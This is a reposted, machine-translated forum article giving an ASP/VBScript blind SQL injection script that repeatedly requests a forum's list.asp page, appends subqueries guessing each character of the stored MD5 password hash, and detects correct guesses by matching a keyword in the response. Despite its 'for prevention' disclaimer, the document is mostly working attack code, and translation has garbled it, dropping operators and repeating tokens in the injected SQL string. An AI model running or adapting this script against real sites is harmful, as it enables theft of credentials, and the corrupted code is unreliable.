SQL injection research [transfer]

xiaoxiao2021-03-06  51

'Do not use for illegal purposes, this code is just to let the majority of ASP enthusiasts understand the principle and prevent it.

Function Bytes2bstr (VIN)

DIM STRRETURN

Dim I, thischarcode, Nextcharcode

Strreturn = ""

For i = 1 to lenb (vin)

Thischarcode = ASCB (MIDB (Vin, I, 1))

IF thischarcode <& h80 then

Strreturn = strreturn & chr (thischarcode)

Else

Nextcharcode = ASCB (MIDB (VIN, I 1, 1))

Strreturn = strreturn & chr (thischarcode) * & H100 cint (nextcharcode))

i = i 1

END IF

NEXT

BYTES2BSTR = STRRETURN

END FUNCTION

function getHTTPPage (url) dim httpset http = createobject ( "MSXML2.XMLHTTP") Http.open "GET", url, falseHttp.send () if Http.readystate <> 4 then exit functionend ifgetHTTPPage = bytes2BSTR (Http.responseBody) set http = Nothingif Err.Number <> 0 Then Err.clear End Function

Function Regexptest (PATRN, STRNG) DIM REGEX, RETVAL 'Establishs variable. Set regex = new regexp 'establishes regular expressions. Regex.pattern = PATRN 'Setting mode. Regex.ignoreCase = false 'Set whether you are case sensitive. Regexptest = regex.test (strng) 'Performs a search test. END FUNCTION

Password = "" Keyword = "Forum Home" 'Returns the string URL1 = "http://qq/bbs/list.asp? BoardId = 7"' SQL injection portfolius = 32'md5 password usually 32-bit DIM Passpass = Array (48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102) 'The cryptographic value is usually 0-9, AF

Server.scripttimeout = 999for i = 1 to passlenflag = falseURL = URL1 & "AND (SELECT ASC (MID (Password," & I & I & I & I & I & I & I & I & I & I & I & I & I)) = "'Constructed SQL statement here is key for J = 0 to Ubound (pass) str = gethttppage (URL & Pass (j)) Flag = regexptest (keyword, str) if flag = true kil tpassword = password & chr (pass (j)) EXIT Forend iFNextNextNextNextNext

Response.write (Password)

转载请注明原文地址:https://www.9cbs.com/read-118889.html

New Post(0)